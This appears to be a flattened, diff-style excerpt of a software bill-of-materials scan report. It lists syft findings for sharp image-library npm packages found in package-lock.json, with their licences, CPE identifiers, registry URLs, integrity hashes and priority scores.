schemaVersion: 1.2.0 + id: 24ce05de10ecc79e + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @img/sharp-libvips-linux-arm64 1.2.4' + title: '@img/sharp-libvips-linux-arm64 1.2.4' + description: 'Package discovered: @img/sharp-libvips-linux-arm64 1.2.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: b77c206e5d189694 + name: '@img/sharp-libvips-linux-arm64' + version: 1.2.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: LGPL-3.0-or-later + spdxExpression: LGPL-3.0-or-later + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-arm64:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-arm64:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_arm64:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_arm64:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40img/sharp-libvips-linux-arm64@1.2.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@img/sharp-libvips-linux-arm64/-/sharp-libvips-linux-arm64-1.2.4.tgz + integrity: sha512-excjX8DfsIcJ10x1Kzr4RcWe1edC9PquDRRPx3YVCvQv+U5p7Yin2s32ftzikXojb1PIFc/9Mt28/y+iRklkrw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 042fdfd641843c8d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @img/sharp-libvips-linux-ppc64 1.2.4' + title: '@img/sharp-libvips-linux-ppc64 1.2.4' + description: 'Package discovered: @img/sharp-libvips-linux-ppc64 1.2.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0a49b35ad8071788 + name: '@img/sharp-libvips-linux-ppc64' + version: 1.2.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: LGPL-3.0-or-later + spdxExpression: LGPL-3.0-or-later + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-ppc64:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-ppc64:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_ppc64:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_ppc64:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40img/sharp-libvips-linux-ppc64@1.2.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@img/sharp-libvips-linux-ppc64/-/sharp-libvips-linux-ppc64-1.2.4.tgz + integrity: sha512-FMuvGijLDYG6lW+b/UvyilUWu5Ayu+3r2d1S8notiGCIyYU/76eig1UfMmkZ7vwgOrzKzlQbFSuQfgm7GYUPpA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 2eef65dffbde81a3 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @img/sharp-libvips-linux-riscv64 1.2.4' + title: '@img/sharp-libvips-linux-riscv64 1.2.4' + description: 'Package discovered: @img/sharp-libvips-linux-riscv64 1.2.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 69aa9726ceb1125a + name: '@img/sharp-libvips-linux-riscv64' + version: 1.2.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: LGPL-3.0-or-later + spdxExpression: LGPL-3.0-or-later + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-riscv64:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-riscv64:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_riscv64:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_riscv64:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40img/sharp-libvips-linux-riscv64@1.2.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@img/sharp-libvips-linux-riscv64/-/sharp-libvips-linux-riscv64-1.2.4.tgz + integrity: sha512-oVDbcR4zUC0ce82teubSm+x6ETixtKZBh/qbREIOcI3cULzDyb18Sr/Wcyx7NRQeQzOiHTNbZFF1UwPS2scyGA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 48c4bc7216358207 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @img/sharp-libvips-linux-s390x 1.2.4' + title: '@img/sharp-libvips-linux-s390x 1.2.4' + description: 'Package discovered: @img/sharp-libvips-linux-s390x 1.2.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: b12e72c485584ae0 + name: '@img/sharp-libvips-linux-s390x' + version: 1.2.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: LGPL-3.0-or-later + spdxExpression: LGPL-3.0-or-later + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-s390x:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-s390x:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_s390x:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_s390x:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40img/sharp-libvips-linux-s390x@1.2.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@img/sharp-libvips-linux-s390x/-/sharp-libvips-linux-s390x-1.2.4.tgz + integrity: sha512-qmp9VrzgPgMoGZyPvrQHqk02uyjA0/QrTO26Tqk6l4ZV0MPWIW6LTkqOIov+J1yEu7MbFQaDpwdwJKhbJvuRxQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 79972044480a2381 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @img/sharp-libvips-linux-x64 1.2.4' + title: '@img/sharp-libvips-linux-x64 1.2.4' + description: 'Package discovered: @img/sharp-libvips-linux-x64 1.2.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: a57b531e02329e6d + name: '@img/sharp-libvips-linux-x64' + version: 1.2.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: LGPL-3.0-or-later + spdxExpression: LGPL-3.0-or-later + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-x64:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-x64:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_x64:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_x64:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40img/sharp-libvips-linux-x64@1.2.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@img/sharp-libvips-linux-x64/-/sharp-libvips-linux-x64-1.2.4.tgz + integrity: sha512-tJxiiLsmHc9Ax1bz3oaOYBURTXGIRDODBqhveVHonrHJ9/+k89qbLl0bcJns+e4t4rvaNBxaEZsFtSfAdquPrw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 7de94e70bc6a1409 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @img/sharp-libvips-linuxmusl-arm64 1.2.4' + title: '@img/sharp-libvips-linuxmusl-arm64 1.2.4' + description: 'Package discovered: @img/sharp-libvips-linuxmusl-arm64 1.2.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 67f7722888e07f97 + name: '@img/sharp-libvips-linuxmusl-arm64' + version: 1.2.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: LGPL-3.0-or-later + spdxExpression: LGPL-3.0-or-later + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl-arm64:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl-arm64:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl_arm64:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl_arm64:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40img/sharp-libvips-linuxmusl-arm64@1.2.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@img/sharp-libvips-linuxmusl-arm64/-/sharp-libvips-linuxmusl-arm64-1.2.4.tgz + integrity: sha512-FVQHuwx1IIuNow9QAbYUzJ+En8KcVm9Lk5+uGUQJHaZmMECZmOlix9HnH7n1TRkXMS0pGxIJokIVB9SuqZGGXw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c540ef9b43418974 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @img/sharp-libvips-linuxmusl-x64 1.2.4' + title: '@img/sharp-libvips-linuxmusl-x64 1.2.4' + description: 'Package discovered: @img/sharp-libvips-linuxmusl-x64 1.2.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 61da63d4bf468c4d + name: '@img/sharp-libvips-linuxmusl-x64' + version: 1.2.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: LGPL-3.0-or-later + spdxExpression: LGPL-3.0-or-later + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl-x64:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl-x64:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl_x64:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl_x64:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40img/sharp-libvips-linuxmusl-x64@1.2.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@img/sharp-libvips-linuxmusl-x64/-/sharp-libvips-linuxmusl-x64-1.2.4.tgz + integrity: sha512-+LpyBk7L44ZIXwz/VYfglaX/okxezESc6UxDSoyo2Ks6Jxc4Y7sGjpgU9s4PMgqgjj1gZCylTieNamqA1MF7Dg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9ac46491201655bd + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @img/sharp-linux-arm 0.34.5' + title: '@img/sharp-linux-arm 0.34.5' + description: 'Package discovered: @img/sharp-linux-arm 0.34.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: dcf7df343a75d233 + name: '@img/sharp-linux-arm' + version: 0.34.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@img\/sharp-linux-arm:\@img\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-linux-arm:\@img\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linux_arm:\@img\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linux_arm:\@img\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40img/sharp-linux-arm@0.34.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@img/sharp-linux-arm/-/sharp-linux-arm-0.34.5.tgz + integrity: 